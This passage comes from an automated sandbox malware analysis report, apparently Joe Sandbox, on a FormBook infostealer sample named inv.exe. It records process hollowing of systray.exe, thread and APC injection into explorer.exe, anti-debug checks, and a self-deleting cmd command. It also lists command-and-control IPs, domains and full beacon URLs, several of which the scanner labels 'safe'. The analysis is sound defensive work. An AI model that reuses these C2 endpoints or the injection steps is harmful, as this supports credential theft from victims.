          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04820050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04820050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04818A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04805210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04823A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04844A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04844A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04894257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0484927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04811B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04811B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04833B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04833B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0099A55A GetProcessHeap,
          Source: C:\Users\user\Desktop\inv.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00972109 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00971755 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00991BC8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00971F74 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00972109 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.164.35.80 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeNetwork Connect: 173.192.101.248 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.88.57.68 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.199.129 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\inv.exeSection loaded: unknown target: C:\Users\user\Desktop\inv.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\inv.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\inv.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\inv.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\inv.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3292
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\inv.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\inv.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: F00000
          Source: C:\Users\user\Desktop\inv.exeProcess created: C:\Users\user\Desktop\inv.exe C:\Users\user\Desktop\inv.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\inv.exe'
          Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000003.00000000.260039044.0000000005F40000.00000004.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.1314890488.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000003.00000000.248446236.0000000001400000.00000002.00000001.sdmp, systray.exe, 00000005.00000002.1315801398.00000000030A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.263820453.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0097221B cpuid
          Source: C:\Users\user\Desktop\inv.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00971E43 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.inv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.inv.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery122Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323024 Sample: inv.exe Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 30 g.msn.com 2->30 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 4 other signatures 2->44 11 inv.exe 1 2->11         started        signatures3 process4 signatures5 54 Maps a DLL or memory area into another process 11->54 56 Tries to detect virtualization through RDTSC time measurements 11->56 14 inv.exe 11->14         started        17 conhost.exe 11->17         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 19 explorer.exe 14->19 injected process8 dnsIp9 32 chartershome.com 192.185.199.129, 49767, 80 UNIFIEDLAYER-AS-1US United States 19->32 34 mycapecoralhomevalue.com 173.192.101.248, 49758, 49779, 80 SOFTLAYERUS United States 19->34 36 25 other IPs or domains 19->36 46 System process connects to network (likely due to code injection or exploit) 19->46 23 systray.exe 19->23         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 23->48 50 Maps a DLL or memory area into another process 23->50 52 Tries to detect virtualization through RDTSC time measurements 23->52 26 cmd.exe 1 23->26         started        process13 process14 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          inv.exe43%VirustotalBrowse
          inv.exe68%ReversingLabsWin32.Trojan.FormBook
          inv.exe100%AviraHEUR/AGEN.1138958
          inv.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.inv.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.inv.exe.970000.0.unpack100%AviraHEUR/AGEN.1138958Download File
          0.0.inv.exe.970000.0.unpack100%AviraHEUR/AGEN.1138958Download File
          2.2.inv.exe.970000.1.unpack100%AviraHEUR/AGEN.1138958Download File
          2.0.inv.exe.970000.0.unpack100%AviraHEUR/AGEN.1138958Download File

          Domains

          SourceDetectionScannerLabelLink
          cfmfair.com0%VirustotalBrowse
          multitask-improvements.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.nextgenmemorabilia.com/hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB40%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.nairobi-paris.com/hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB40%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.azery.site/hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA==0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.multitask-improvements.com/hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw==0%Avira URL Cloudsafe
          http://www.affiliateclubindia.com/hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.cfmfair.com/hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB40%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.fittcycleacademy.com/hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB40%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.skinnerttc.com/hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB40%Avira URL Cloudsafe
